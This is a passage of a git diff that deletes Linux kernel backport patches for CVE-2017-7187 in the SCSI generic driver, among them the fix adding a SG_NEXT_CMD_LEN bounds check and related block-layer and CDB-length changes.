5cmlnaHQgKEMpIDE5OTIgTGF3cmVuY2UgRm9hcmQKKyAqIFZlcnNpb24gMiBhbmQgMyBleHRlbnNpb25zIHRvIGRyaXZlcjoKKyAqCUNvcHlyaWdodCAoQykgMTk5OCAtIDIwMTQgRG91Z2xhcyBHaWxiZXJ0CisgKgorICogIFZlcnNpb246IDMuNS4zNiAoMjAxNDA2MDMpCisgKiAgVGhpcyB2ZXJzaW9uIGlzIGZvciAyLjYgYW5kIDMgc2VyaWVzIGtlcm5lbHMuCisgKgorICogRG9jdW1lbnRhdGlvbgorICogPT09PT09PT09PT09PQorICogQSB3ZWIgc2l0ZSBmb3IgdGhlIFNHIGRldmljZSBkcml2ZXIgY2FuIGJlIGZvdW5kIGF0OgorICoJaHR0cDovL3NnLmRhbm55LmN6L3NnICBbYWx0ZXJuYXRpdmVseSBjaGVjayB0aGUgTUFJTlRBSU5FUlMgZmlsZV0KKyAqIFRoZSBkb2N1bWVudGF0aW9uIGZvciB0aGUgc2cgdmVyc2lvbiAzIGRyaXZlciBjYW4gYmUgZm91bmQgYXQ6CisgKglodHRwOi8vc2cuZGFubnkuY3ovc2cvcC9zZ192M19oby5odG1sCisgKiBBbHNvIHNlZTogPGtlcm5lbF9zb3VyY2U+L0RvY3VtZW50YXRpb24vc2NzaS9zY3NpLWdlbmVyaWMudHh0CisgKgorICogRm9yIHV0aWxpdHkgYW5kIHRlc3QgcHJvZ3JhbXMgc2VlO
iBodHRwOi8vc2cuZGFubnkuY3ovc2cvc2czX3V0aWxzLmh0bWwKKyAqLwogCiAjaWZkZWYgX19LRVJORUxfXwogZXh0ZXJuIGludCBzZ19iaWdfYnVmZjsgLyogZm9yIHN5c2N0bCAqLwogI2VuZGlmCiAKLS8qIE5ldyBpbnRlcmZhY2UgaW50cm9kdWNlZCBpbiB0aGUgMy54IFNHIGRyaXZlcnMgZm9sbG93cyAqLwogCiB0eXBlZGVmIHN0cnVjdCBzZ19pb3ZlYyAvKiBzYW1lIHN0cnVjdHVyZSBhcyB1c2VkIGJ5IHJlYWR2KCkgTGludXggc3lzdGVtICovCiB7ICAgICAgICAgICAgICAgICAgICAgICAvKiBjYWxsLiBJdCBkZWZpbmVzIG9uZSBzY2F0dGVyLWdhdGhlciBlbGVtZW50LiAqLwpAQCAtODcsNyArNDQsNyBAQAogewogICAgIGludCBpbnRlcmZhY2VfaWQ7ICAgICAgICAgICAvKiBbaV0gJ1MnIGZvciBTQ1NJIGdlbmVyaWMgKHJlcXVpcmVkKSAqLwogICAgIGludCBkeGZlcl9kaXJlY3Rpb247ICAgICAgICAvKiBbaV0gZGF0YSB0cmFuc2ZlciBkaXJlY3Rpb24gICovCi0gICAgdW5zaWduZWQgY2hhciBjbWRfbGVuOyAgICAgIC8qIFtpXSBTQ1NJIGNvbW1hbmQgbGVuZ3RoICggPD0gMTYgYnl0ZXMpICovCisgICAgdW5zaWduZWQgY2hhciBjbWRfbGVuOyAgICAgIC8qIFtpXSBTQ1NJIGNvbW1hbmQgbGVuZ3RoICovCiAgICAgdW5zaWduZWQgY2hhciBteF9zYl9sZW47ICAgIC8qIFtpXSBtYXggbGVuZ3RoIHRvIHdyaXRlIHRvIHNicCAqLwogICAgIHVuc2lnbmVkIHNob3J0IGlvdmVjX2NvdW50OyAvKiBbaV0gMCBpbXBsaWVzIG5vIHNjYXR0ZXIgZ2F0aGVyICovCiAgICAgdW5zaWduZWQgaW50IGR4ZmVyX2xlbjsgICAgIC8qIFtpXSBieXRlIGNvdW50IG9mIGRhdGEgdHJhbnNmZXIgKi8K \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2017-7187/3.10/0006.patch b/Patches/Linux_CVEs/CVE-2017-7187/3.10/0006.patch deleted file mode 100644 index 218df720..00000000 --- a/Patches/Linux_CVEs/CVE-2017-7187/3.10/0006.patch +++ /dev/null 
@@ -1,29 +0,0 @@
-From 0bf5dc993cf6be1b1dd716fb05c1fa84623093e5 Mon Sep 17 00:00:00 2001
-From: peter chang
-Date: Wed, 15 Feb 2017 14:11:54 -0800
-Subject: [PATCH] scsi: sg: check length passed to SG_NEXT_CMD_LEN
-
-The user can control the size of the next command passed along, but the
-value passed to the ioctl isn't checked against the usable max command
-size.
-
-Change-Id: I9e8eb8ca058c0103a22f5d99d77919432893aa4c
-Cc:
-Signed-off-by: Peter Chang
-Acked-by: Douglas Gilbert
-Signed-off-by: Martin K. Petersen
----
-
-diff --git a/drivers/scsi/sg.c b/drivers/scsi/sg.c
-index 96d635e..4a6b13b 100644
---- a/drivers/scsi/sg.c
-+++ b/drivers/scsi/sg.c
-@@ -978,6 +978,8 @@
- result = get_user(val, ip);
- if (result)
- return result;
-+ if (val > SG_MAX_CDB_SIZE)
-+ return -ENOMEM;
- sfp->next_cmd_len = (val > 0) ? val : 0;
- return 0;
- case SG_GET_VERSION_NUM:
diff --git a/Patches/Linux_CVEs/CVE-2017-7187/3.10/0006.patch.base64 b/Patches/Linux_CVEs/CVE-2017-7187/3.10/0006.patch.base64
deleted file mode 100644
index dfa5014d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7187/3.10/0006.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-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
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-7187/3.4/0001.patch b/Patches/Linux_CVEs/CVE-2017-7187/3.4/0001.patch
deleted file mode 100644
index a6938be5..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7187/3.4/0001.patch
+++ /dev/null
@@ -1,383 +0,0 @@ -From 1f0843591703c3d664a236e2d3a7a855fa9451d6 Mon Sep 17 00:00:00 2001 -From: Jens Axboe -Date: Fri, 06 Jun 2014 07:57:37 -0600 -Subject: [PATCH] BACKPORT: block: add blk_rq_set_block_pc() - -With the optimizations around not clearing the full request at alloc -time, we are leaving some of the needed init for REQ_TYPE_BLOCK_PC -up to the user allocating the request. - -Add a blk_rq_set_block_pc() that sets the command type to -REQ_TYPE_BLOCK_PC, and properly initializes the members associated -with this type of request. Update callers to use this function instead -of manipulating rq->cmd_type directly. - -Includes fixes from Christoph Hellwig for my half-assed -attempt. - -Change-Id: Ifc386dfb951c5d6adebf48ff38135dda28e4b1ce -Signed-off-by: Jens Axboe ---- - -diff --git a/block/blk-core.c b/block/blk-core.c -index eb0ec60..c7f7637 100644 ---- a/block/blk-core.c -+++ b/block/blk-core.c -@@ -1043,6 +1043,8 @@ - if (unlikely(!rq)) - return ERR_PTR(-ENOMEM); - -+ blk_rq_set_block_pc(rq); -+ - for_each_bio(bio) { - struct bio *bounce_bio = bio; - int ret; -@@ -1060,6 +1062,22 @@ - EXPORT_SYMBOL(blk_make_request); - - /** -+ * blk_rq_set_block_pc - initialize a requeest to type BLOCK_PC -+ * @rq: request to be initialized -+ * -+ */ -+void blk_rq_set_block_pc(struct request *rq) -+{ -+ rq->cmd_type = REQ_TYPE_BLOCK_PC; -+ rq->__data_len = 0; -+ rq->__sector = (sector_t) -1; -+ rq->bio = rq->biotail = NULL; -+ memset(rq->__cmd, 0, sizeof(rq->__cmd)); -+ rq->cmd = rq->__cmd; -+} -+EXPORT_SYMBOL(blk_rq_set_block_pc); -+ -+/** - * blk_requeue_request - put a request back on queue - * @q: request queue where request should be inserted - * @rq: request to be inserted -diff --git a/block/bsg.c b/block/bsg.c -index b1c1d54..8c750d5 100644 ---- a/block/bsg.c -+++ b/block/bsg.c -@@ -196,7 +196,6 @@ - * fill in request structure - */ - rq->cmd_len = hdr->request_len; -- rq->cmd_type = REQ_TYPE_BLOCK_PC; - - rq->timeout = msecs_to_jiffies(hdr->timeout); - if 
(!rq->timeout) -@@ -273,6 +272,8 @@ - rq = blk_get_request(q, rw, GFP_KERNEL); - if (!rq) - return ERR_PTR(-ENOMEM); -+ blk_rq_set_block_pc(rq); -+ - ret = blk_fill_sgv4_hdr_rq(q, rq, hdr, bd, has_write_perm); - if (ret) - goto out; -diff --git a/block/scsi_ioctl.c b/block/scsi_ioctl.c -index 260fa80..4118a81 100644 ---- a/block/scsi_ioctl.c -+++ b/block/scsi_ioctl.c -@@ -232,7 +232,6 @@ - * fill in request structure - */ - rq->cmd_len = hdr->cmd_len; -- rq->cmd_type = REQ_TYPE_BLOCK_PC; - - rq->timeout = msecs_to_jiffies(hdr->timeout); - if (!rq->timeout) -@@ -313,6 +312,7 @@ - rq = blk_get_request(q, writing ? WRITE : READ, GFP_KERNEL); - if (!rq) - return -ENOMEM; -+ blk_rq_set_block_pc(rq); - - if (blk_fill_sghdr_rq(q, rq, hdr, mode)) { - blk_put_request(rq); -@@ -511,7 +511,7 @@ - memset(sense, 0, sizeof(sense)); - rq->sense = sense; - rq->sense_len = 0; -- rq->cmd_type = REQ_TYPE_BLOCK_PC; -+ blk_rq_set_block_pc(rq); - - blk_execute_rq(q, disk, rq, 0); - -@@ -544,7 +544,7 @@ - int err; - - rq = blk_get_request(q, WRITE, __GFP_WAIT); -- rq->cmd_type = REQ_TYPE_BLOCK_PC; -+ blk_rq_set_block_pc(rq); - rq->timeout = BLK_DEFAULT_SG_TIMEOUT; - rq->cmd[0] = cmd; - rq->cmd[4] = data; -diff --git a/drivers/block/pktcdvd.c b/drivers/block/pktcdvd.c -index ba66e44..39ffe9c 100644 ---- a/drivers/block/pktcdvd.c -+++ b/drivers/block/pktcdvd.c -@@ -742,6 +742,7 @@ - - rq = blk_get_request(q, (cgc->data_direction == CGC_DATA_WRITE) ? 
- WRITE : READ, __GFP_WAIT); -+ blk_rq_set_block_pc(rq); - - if (cgc->buflen) { - if (blk_rq_map_kern(q, rq, cgc->buffer, cgc->buflen, __GFP_WAIT)) -@@ -752,7 +753,6 @@ - memcpy(rq->cmd, cgc->cmd, CDROM_PACKET_SIZE); - - rq->timeout = 60*HZ; -- rq->cmd_type = REQ_TYPE_BLOCK_PC; - if (cgc->quiet) - rq->cmd_flags |= REQ_QUIET; - -diff --git a/drivers/cdrom/cdrom.c b/drivers/cdrom/cdrom.c -index d620b44..7ab528d 100644 ---- a/drivers/cdrom/cdrom.c -+++ b/drivers/cdrom/cdrom.c -@@ -2165,6 +2165,7 @@ - ret = -ENOMEM; - break; - } -+ blk_rq_set_block_pc(rq); - - ret = blk_rq_map_user(q, rq, NULL, ubuf, len, GFP_KERNEL); - if (ret) { -@@ -2184,7 +2185,6 @@ - rq->cmd[9] = 0xf8; - - rq->cmd_len = 12; -- rq->cmd_type = REQ_TYPE_BLOCK_PC; - rq->timeout = 60 * HZ; - bio = rq->bio; - -diff --git a/drivers/scsi/device_handler/scsi_dh_alua.c b/drivers/scsi/device_handler/scsi_dh_alua.c -index 04c5cea..36fb68c 100644 ---- a/drivers/scsi/device_handler/scsi_dh_alua.c -+++ b/drivers/scsi/device_handler/scsi_dh_alua.c -@@ -111,6 +111,7 @@ - "%s: blk_get_request failed\n", __func__); - return NULL; - } -+ blk_rq_set_block_pc(rq); - - if (buflen && blk_rq_map_kern(q, rq, buffer, buflen, GFP_NOIO)) { - blk_put_request(rq); -@@ -119,7 +120,6 @@ - return NULL; - } - -- rq->cmd_type = REQ_TYPE_BLOCK_PC; - rq->cmd_flags |= REQ_FAILFAST_DEV | REQ_FAILFAST_TRANSPORT | - REQ_FAILFAST_DRIVER; - rq->retries = ALUA_FAILOVER_RETRIES; -diff --git a/drivers/scsi/device_handler/scsi_dh_emc.c b/drivers/scsi/device_handler/scsi_dh_emc.c -index e1c8be0..6f07f7f 100644 ---- a/drivers/scsi/device_handler/scsi_dh_emc.c -+++ b/drivers/scsi/device_handler/scsi_dh_emc.c -@@ -280,6 +280,7 @@ - return NULL; - } - -+ blk_rq_set_block_pc(rq); - rq->cmd_len = COMMAND_SIZE(cmd); - rq->cmd[0] = cmd; - -@@ -304,7 +305,6 @@ - break; - } - -- rq->cmd_type = REQ_TYPE_BLOCK_PC; - rq->cmd_flags |= REQ_FAILFAST_DEV | REQ_FAILFAST_TRANSPORT | - REQ_FAILFAST_DRIVER; - rq->timeout = CLARIION_TIMEOUT; -diff --git 
a/drivers/scsi/device_handler/scsi_dh_hp_sw.c b/drivers/scsi/device_handler/scsi_dh_hp_sw.c -index 084062b..e9d9fea 100644 ---- a/drivers/scsi/device_handler/scsi_dh_hp_sw.c -+++ b/drivers/scsi/device_handler/scsi_dh_hp_sw.c -@@ -120,7 +120,7 @@ - if (!req) - return SCSI_DH_RES_TEMP_UNAVAIL; - -- req->cmd_type = REQ_TYPE_BLOCK_PC; -+ blk_rq_set_block_pc(req); - req->cmd_flags |= REQ_FAILFAST_DEV | REQ_FAILFAST_TRANSPORT | - REQ_FAILFAST_DRIVER; - req->cmd_len = COMMAND_SIZE(TEST_UNIT_READY); -@@ -250,7 +250,7 @@ - if (!req) - return SCSI_DH_RES_TEMP_UNAVAIL; - -- req->cmd_type = REQ_TYPE_BLOCK_PC; -+ blk_rq_set_block_pc(req); - req->cmd_flags |= REQ_FAILFAST_DEV | REQ_FAILFAST_TRANSPORT | - REQ_FAILFAST_DRIVER; - req->cmd_len = COMMAND_SIZE(START_STOP); -diff --git a/drivers/scsi/device_handler/scsi_dh_rdac.c b/drivers/scsi/device_handler/scsi_dh_rdac.c -index 20c4557..0439652 100644 ---- a/drivers/scsi/device_handler/scsi_dh_rdac.c -+++ b/drivers/scsi/device_handler/scsi_dh_rdac.c -@@ -279,6 +279,7 @@ - "get_rdac_req: blk_get_request failed.\n"); - return NULL; - } -+ blk_rq_set_block_pc(rq); - - if (buflen && blk_rq_map_kern(q, rq, buffer, buflen, GFP_NOIO)) { - blk_put_request(rq); -@@ -287,7 +288,6 @@ - return NULL; - } - -- rq->cmd_type = REQ_TYPE_BLOCK_PC; - rq->cmd_flags |= REQ_FAILFAST_DEV | REQ_FAILFAST_TRANSPORT | - REQ_FAILFAST_DRIVER; - rq->retries = RDAC_RETRIES; -diff --git a/drivers/scsi/osd/osd_initiator.c b/drivers/scsi/osd/osd_initiator.c -index c06b8e5..9ad3ac7 100644 ---- a/drivers/scsi/osd/osd_initiator.c -+++ b/drivers/scsi/osd/osd_initiator.c -@@ -1566,6 +1566,7 @@ - if (unlikely(!req)) - return ERR_PTR(-ENOMEM); - -+ blk_rq_set_block_pc(req); - return req; - } - } -@@ -1586,7 +1587,6 @@ - } - - or->request = req; -- req->cmd_type = REQ_TYPE_BLOCK_PC; - req->cmd_flags |= REQ_QUIET; - - req->timeout = or->timeout; -@@ -1604,7 +1604,7 @@ - ret = PTR_ERR(req); - goto out; - } -- req->cmd_type = REQ_TYPE_BLOCK_PC; -+ blk_rq_set_block_pc(req); - 
or->in.req = or->request->next_rq = req; - } - } else if (has_in) -diff --git a/drivers/scsi/osst.c b/drivers/scsi/osst.c -index 21883a2..0727ea7 100644 ---- a/drivers/scsi/osst.c -+++ b/drivers/scsi/osst.c -@@ -365,7 +365,7 @@ - if (!req) - return DRIVER_ERROR << 24; - -- req->cmd_type = REQ_TYPE_BLOCK_PC; -+ blk_rq_set_block_pc(req); - req->cmd_flags |= REQ_QUIET; - - SRpnt->bio = NULL; -diff --git a/drivers/scsi/scsi_error.c b/drivers/scsi/scsi_error.c -index 386f0c5..d4c31d4 100644 ---- a/drivers/scsi/scsi_error.c -+++ b/drivers/scsi/scsi_error.c -@@ -1624,6 +1624,8 @@ - */ - req = blk_get_request(sdev->request_queue, READ, GFP_KERNEL); - -+ blk_rq_set_block_pc(req); -+ - req->cmd[0] = ALLOW_MEDIUM_REMOVAL; - req->cmd[1] = 0; - req->cmd[2] = 0; -@@ -1633,7 +1635,6 @@ - - req->cmd_len = COMMAND_SIZE(req->cmd[0]); - -- req->cmd_type = REQ_TYPE_BLOCK_PC; - req->cmd_flags |= REQ_QUIET; - req->timeout = 10 * HZ; - req->retries = 5; -diff --git a/drivers/scsi/scsi_lib.c b/drivers/scsi/scsi_lib.c -index 5dfd749..725b405 100644 ---- a/drivers/scsi/scsi_lib.c -+++ b/drivers/scsi/scsi_lib.c -@@ -217,6 +217,7 @@ - req = blk_get_request(sdev->request_queue, write, __GFP_WAIT); - if (!req) - return ret; -+ blk_rq_set_block_pc(req); - - if (bufflen && blk_rq_map_kern(sdev->request_queue, req, - buffer, bufflen, __GFP_WAIT)) -@@ -228,7 +229,6 @@ - req->sense_len = 0; - req->retries = retries; - req->timeout = timeout; -- req->cmd_type = REQ_TYPE_BLOCK_PC; - req->cmd_flags |= flags | REQ_QUIET | REQ_PREEMPT; - - /* -diff --git a/drivers/scsi/sg.c b/drivers/scsi/sg.c -index 3ec5b33..216d31f 100644 ---- a/drivers/scsi/sg.c -+++ b/drivers/scsi/sg.c -@@ -1655,10 +1655,9 @@ - if (!rq) - return -ENOMEM; - -+ blk_rq_set_block_pc(rq); - memcpy(rq->cmd, cmd, hp->cmd_len); -- - rq->cmd_len = hp->cmd_len; -- rq->cmd_type = REQ_TYPE_BLOCK_PC; - - srp->rq = rq; - rq->end_io_data = srp; -diff --git a/drivers/scsi/st.c b/drivers/scsi/st.c -index e41998c..08ad530 100644 ---- 
a/drivers/scsi/st.c -+++ b/drivers/scsi/st.c -@@ -488,7 +488,7 @@ - if (!req) - return DRIVER_ERROR << 24; - -- req->cmd_type = REQ_TYPE_BLOCK_PC; -+ blk_rq_set_block_pc(req); - req->cmd_flags |= REQ_QUIET; - - mdata->null_mapped = 1; -diff --git a/drivers/target/target_core_pscsi.c b/drivers/target/target_core_pscsi.c -index 94c905f..d28f8d1 100644 ---- a/drivers/target/target_core_pscsi.c -+++ b/drivers/target/target_core_pscsi.c -@@ -1083,6 +1083,8 @@ - TCM_LOGICAL_UNIT_COMMUNICATION_FAILURE; - return -ENODEV; - } -+ -+ blk_rq_set_block_pc(req); - } else { - BUG_ON(!task->task_size); - -@@ -1104,7 +1106,6 @@ - } - } - -- req->cmd_type = REQ_TYPE_BLOCK_PC; - req->end_io = pscsi_req_done; - req->end_io_data = task; - req->cmd_len = scsi_command_size(pt->pscsi_cdb); -diff --git a/include/linux/blkdev.h b/include/linux/blkdev.h -index 21dc2aa..f37d1f0 100644 ---- a/include/linux/blkdev.h -+++ b/include/linux/blkdev.h -@@ -675,6 +675,7 @@ - extern struct request *blk_get_request(struct request_queue *, int, gfp_t); - extern struct request *blk_make_request(struct request_queue *, struct bio *, - gfp_t); -+extern void blk_rq_set_block_pc(struct request *); - extern void blk_requeue_request(struct request_queue *, struct request *); - extern int blk_reinsert_request(struct request_queue *q, struct request *rq); - extern bool blk_reinsert_req_sup(struct request_queue *q); diff --git a/Patches/Linux_CVEs/CVE-2017-7187/3.4/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-7187/3.4/0001.patch.base64 deleted file mode 100644 index a3326fea..00000000 --- a/Patches/Linux_CVEs/CVE-2017-7187/3.4/0001.patch.base64 +++ /dev/null @@ -1 +0,0 @@ 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 \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2017-7187/3.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-7187/3.4/0002.patch deleted file mode 100644 index b9a7bd36..00000000 --- a/Patches/Linux_CVEs/CVE-2017-7187/3.4/0002.patch +++ /dev/null 
@@ -1,263 +0,0 @@ -From 8093bf02878aa659cfcf8cbfc272b2ad45eef24f Mon Sep 17 00:00:00 2001 -From: Douglas Gilbert -Date: Tue, 03 Jun 2014 13:18:18 -0400 -Subject: [PATCH] BACKPORT: sg: relax 16 byte cdb restriction - - - remove the 16 byte CDB (SCSI command) length limit from the sg driver - by handling longer CDBs the same way as the bsg driver. Remove comment - from sg.h public interface about the cmd_len field being limited to 16 - bytes. - - remove some dead code caused by this change - - cleanup comment block at the top of sg.h, fix urls - -Change-Id: Ie8150e5375b3316d5d5206f079c4a50f1c50b755 -Signed-off-by: Douglas Gilbert -Reviewed-by: Mike Christie -Reviewed-by: Hannes Reinecke -Signed-off-by: Christoph Hellwig ---- - -diff --git a/drivers/scsi/sg.c b/drivers/scsi/sg.c -index 216d31f..56178bc 100644 ---- a/drivers/scsi/sg.c -+++ b/drivers/scsi/sg.c -@@ -7,9 +7,7 @@ - * Original driver (sg.c): - * Copyright (C) 1992 Lawrence Foard - * Version 2 and 3 extensions to driver: -- * Copyright (C) 1998 - 2005 Douglas Gilbert -- * -- * Modified 19-JAN-1998 Richard Gooch Devfs support -+ * Copyright (C) 1998 - 2014 Douglas Gilbert - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License as published by -@@ -18,11 +16,11 @@ - * - */ - --static int sg_version_num = 30534; /* 2 digits for each component */ --#define SG_VERSION_STR "3.5.34" -+static int sg_version_num = 30536; /* 2 digits for each component */ -+#define SG_VERSION_STR "3.5.36" - - /* -- * D. P. Gilbert (dgilbert@interlog.com, dougg@triode.net.au), notes: -+ * D. P. Gilbert (dgilbert@interlog.com), notes: - * - scsi logging is available via SCSI_LOG_TIMEOUT macros. First - * the kernel/module needs to be built with CONFIG_SCSI_LOGGING - * (otherwise the macros compile to empty statements). 
-@@ -63,7 +61,7 @@ - - #ifdef CONFIG_SCSI_PROC_FS - #include --static char *sg_version_date = "20061027"; -+static char *sg_version_date = "20140603"; - - static int sg_proc_init(void); - static void sg_proc_cleanup(void); -@@ -72,6 +70,12 @@ - #define SG_ALLOW_DIO_DEF 0 - - #define SG_MAX_DEVS 32768 -+ -+/* SG_MAX_CDB_SIZE should be 260 (spc4r37 section 3.1.30) however the type -+ * of sg_io_hdr::cmd_len can only represent 255. All SCSI commands greater -+ * than 16 bytes are "variable length" whose length is a multiple of 4 -+ */ -+#define SG_MAX_CDB_SIZE 252 - - /* - * Suppose you want to calculate the formula muldiv(x,m,d)=int(x * m / d) -@@ -159,7 +163,7 @@ - char force_packid; /* 1 -> pack_id input to read(), 0 -> ignored */ - volatile char closed; /* 1 -> fd closed but request(s) outstanding */ - char cmd_q; /* 1 -> allow command queuing, 0 -> don't */ -- char next_cmd_len; /* 0 -> automatic (def), >0 -> use on next write() */ -+ unsigned char next_cmd_len; /* 0: automatic, >0: use on next write() */ - char keep_orphan; /* 0 -> drop orphan (def), 1 -> keep for read() */ - char mmap_called; /* 0 -> mmap() never called on this fd */ - struct kref f_ref; -@@ -542,7 +546,7 @@ - Sg_request *srp; - struct sg_header old_hdr; - sg_io_hdr_t *hp; -- unsigned char cmnd[MAX_COMMAND_SIZE]; -+ unsigned char cmnd[SG_MAX_CDB_SIZE]; - - if (unlikely(segment_eq(get_fs(), KERNEL_DS))) - return -EINVAL; -@@ -577,12 +581,6 @@ - buf += SZ_SG_HEADER; - __get_user(opcode, buf); - if (sfp->next_cmd_len > 0) { -- if (sfp->next_cmd_len > MAX_COMMAND_SIZE) { -- SCSI_LOG_TIMEOUT(1, printk("sg_write: command length too long\n")); -- sfp->next_cmd_len = 0; -- sg_remove_request(sfp, srp); -- return -EIO; -- } - cmd_size = sfp->next_cmd_len; - sfp->next_cmd_len = 0; /* reset so only this write() effected */ - } else { -@@ -654,7 +652,7 @@ - int k; - Sg_request *srp; - sg_io_hdr_t *hp; -- unsigned char cmnd[MAX_COMMAND_SIZE]; -+ unsigned char cmnd[SG_MAX_CDB_SIZE]; - int timeout; - unsigned 
long ul_timeout; - -@@ -1647,15 +1645,27 @@ - struct request_queue *q = sfp->parentdp->device->request_queue; - struct rq_map_data *md, map_data; - int rw = hp->dxfer_direction == SG_DXFER_TO_DEV ? WRITE : READ; -+ unsigned char *long_cmdp = NULL; - - SCSI_LOG_TIMEOUT(4, printk(KERN_INFO "sg_start_req: dxfer_len=%d\n", - dxfer_len)); - -+ if (hp->cmd_len > BLK_MAX_CDB) { -+ long_cmdp = kzalloc(hp->cmd_len, GFP_KERNEL); -+ if (!long_cmdp) -+ return -ENOMEM; -+ } -+ - rq = blk_get_request(q, rw, GFP_ATOMIC); -- if (!rq) -+ if (!rq) { -+ kfree(long_cmdp); - return -ENOMEM; -+ } - - blk_rq_set_block_pc(rq); -+ -+ if (hp->cmd_len > BLK_MAX_CDB) -+ rq->cmd = long_cmdp; - memcpy(rq->cmd, cmd, hp->cmd_len); - rq->cmd_len = hp->cmd_len; - -@@ -1740,6 +1750,8 @@ - if (srp->bio) - ret = blk_rq_unmap_user(srp->bio); - -+ if (srp->rq->cmd != srp->rq->__cmd) -+ kfree(srp->rq->cmd); - blk_put_request(srp->rq); - } - -diff --git a/include/scsi/sg.h b/include/scsi/sg.h -index a9f3c6f..d8c0c43 100644 ---- a/include/scsi/sg.h -+++ b/include/scsi/sg.h -@@ -4,77 +4,34 @@ - #include - - /* -- History: -- Started: Aug 9 by Lawrence Foard (entropy@world.std.com), to allow user -- process control of SCSI devices. -- Development Sponsored by Killy Corp. NY NY --Original driver (sg.h): --* Copyright (C) 1992 Lawrence Foard --Version 2 and 3 extensions to driver: --* Copyright (C) 1998 - 2006 Douglas Gilbert -- -- Version: 3.5.34 (20060920) -- This version is for 2.6 series kernels. 
-- -- For a full changelog see http://www.torque.net/sg -- --Map of SG verions to the Linux kernels in which they appear: -- ---------- ---------------------------------- -- original all kernels < 2.2.6 -- 2.1.40 2.2.20 -- 3.0.x optional version 3 sg driver for 2.2 series -- 3.1.17++ 2.4.0++ -- 3.5.30++ 2.6.0++ -- --Major new features in SG 3.x driver (cf SG 2.x drivers) -- - SG_IO ioctl() combines function if write() and read() -- - new interface (sg_io_hdr_t) but still supports old interface -- - scatter/gather in user space, direct IO, and mmap supported -- -- The normal action of this driver is to use the adapter (HBA) driver to DMA -- data into kernel buffers and then use the CPU to copy the data into the -- user space (vice versa for writes). That is called "indirect" IO due to -- the double handling of data. There are two methods offered to remove the -- redundant copy: 1) direct IO and 2) using the mmap() system call to map -- the reserve buffer (this driver has one reserve buffer per fd) into the -- user space. Both have their advantages. -- In terms of absolute speed mmap() is faster. If speed is not a concern, -- indirect IO should be fine. Read the documentation for more information. -- -- ** N.B. To use direct IO 'echo 1 > /proc/scsi/sg/allow_dio' or -- 'echo 1 > /sys/module/sg/parameters/allow_dio' is needed. -- That attribute is 0 by default. ** -- -- Historical note: this SCSI pass-through driver has been known as "sg" for -- a decade. In broader kernel discussions "sg" is used to refer to scatter -- gather techniques. The context should clarify which "sg" is referred to. -- -- Documentation -- ============= -- A web site for the SG device driver can be found at: -- http://www.torque.net/sg [alternatively check the MAINTAINERS file] -- The documentation for the sg version 3 driver can be found at: -- http://www.torque.net/sg/p/sg_v3_ho.html -- This is a rendering from DocBook source [change the extension to "sgml" -- or "xml"]. 
There are renderings in "ps", "pdf", "rtf" and "txt" (soon). -- The SG_IO ioctl is now found in other parts kernel (e.g. the block layer). -- For more information see http://www.torque.net/sg/sg_io.html -- -- The older, version 2 documents discuss the original sg interface in detail: -- http://www.torque.net/sg/p/scsi-generic.txt -- http://www.torque.net/sg/p/scsi-generic_long.txt -- Also available: /Documentation/scsi/scsi-generic.txt -- -- Utility and test programs are available at the sg web site. They are -- packaged as sg3_utils (for the lk 2.4 and 2.6 series) and sg_utils -- (for the lk 2.2 series). --*/ -+ * History: -+ * Started: Aug 9 by Lawrence Foard (entropy@world.std.com), to allow user -+ * process control of SCSI devices. -+ * Development Sponsored by Killy Corp. NY NY -+ * -+ * Original driver (sg.h): -+ * Copyright (C) 1992 Lawrence Foard -+ * Version 2 and 3 extensions to driver: -+ * Copyright (C) 1998 - 2014 Douglas Gilbert -+ * -+ * Version: 3.5.36 (20140603) -+ * This version is for 2.6 and 3 series kernels. -+ * -+ * Documentation -+ * ============= -+ * A web site for the SG device driver can be found at: -+ * http://sg.danny.cz/sg [alternatively check the MAINTAINERS file] -+ * The documentation for the sg version 3 driver can be found at: -+ * http://sg.danny.cz/sg/p/sg_v3_ho.html -+ * Also see: /Documentation/scsi/scsi-generic.txt -+ * -+ * For utility and test programs see: http://sg.danny.cz/sg/sg3_utils.html -+ */ - - #ifdef __KERNEL__ - extern int sg_big_buff; /* for sysctl */ - #endif - --/* New interface introduced in the 3.x SG drivers follows */ - - typedef struct sg_iovec /* same structure as used by readv() Linux system */ - { /* call. It defines one scatter-gather element. 
*/ -@@ -87,7 +44,7 @@ - { - int interface_id; /* [i] 'S' for SCSI generic (required) */ - int dxfer_direction; /* [i] data transfer direction */ -- unsigned char cmd_len; /* [i] SCSI command length ( <= 16 bytes) */ -+ unsigned char cmd_len; /* [i] SCSI command length */ - unsigned char mx_sb_len; /* [i] max length to write to sbp */ - unsigned short iovec_count; /* [i] 0 implies no scatter gather */ - unsigned int dxfer_len; /* [i] byte count of data transfer */ diff --git a/Patches/Linux_CVEs/CVE-2017-7187/3.4/0002.patch.base64 b/Patches/Linux_CVEs/CVE-2017-7187/3.4/0002.patch.base64 deleted file mode 100644 index 6ff090c2..00000000 --- a/Patches/Linux_CVEs/CVE-2017-7187/3.4/0002.patch.base64 +++ /dev/null @@ -1 +0,0 @@ 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 \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2017-7187/3.4/0003.patch b/Patches/Linux_CVEs/CVE-2017-7187/3.4/0003.patch deleted file mode 100644 index 5bf99fee..00000000 --- a/Patches/Linux_CVEs/CVE-2017-7187/3.4/0003.patch +++ /dev/null @@ -1,29 +0,0 @@ -From c38b9d2d38678815745eae28512a03d5e1a3dcf1 Mon Sep 17 00:00:00 2001 -From: peter chang -Date: Wed, 15 Feb 2017 14:11:54 -0800 -Subject: [PATCH] scsi: sg: check length passed to SG_NEXT_CMD_LEN - -The user can control the size of the next command passed along, but the -value passed to the ioctl isn't checked against the usable max command -size. - -Change-Id: Icbb33a63776954de662eb858ede300fbcb3710f4 -Cc: -Signed-off-by: Peter Chang -Acked-by: Douglas Gilbert -Signed-off-by: Martin K. Petersen ---- - -diff --git a/drivers/scsi/sg.c b/drivers/scsi/sg.c -index 56178bc..84f5a76 100644 ---- a/drivers/scsi/sg.c -+++ b/drivers/scsi/sg.c -@@ -959,6 +959,8 @@ - result = get_user(val, ip); - if (result) - 